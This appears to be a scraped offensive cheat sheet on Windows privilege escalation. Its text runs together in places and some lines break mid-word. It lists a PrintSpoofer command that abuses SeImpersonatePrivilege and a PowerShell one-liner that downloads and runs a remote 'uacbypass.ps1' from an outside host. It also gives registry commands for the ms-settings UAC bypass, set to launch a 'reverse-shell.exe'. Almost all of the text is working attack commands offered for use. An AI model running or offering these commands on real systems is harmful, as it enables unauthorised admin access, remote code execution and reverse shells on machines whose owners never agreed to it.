Privilege Escalation
SeImpersonatePrivilege
PrintSpoofer64.exe -i -c powershelliex(new-object net.webclient).downloadstring('http://192.168.1.1/uacbypass.ps1');altUse these commands in powershell session:
New-Item "HKCU:\Software\Classes\ms-settings\shell\open\command" -Force
New-ItemProperty -Path "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Name "Delega-
teExecute" -Value "" -Force
Set-ItemProperty -Path "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Name "(default)" -
Value "powershell.exe -exec bypass -c C:\Windows\Tasks\reverse-shell.exe" -ForceLast updated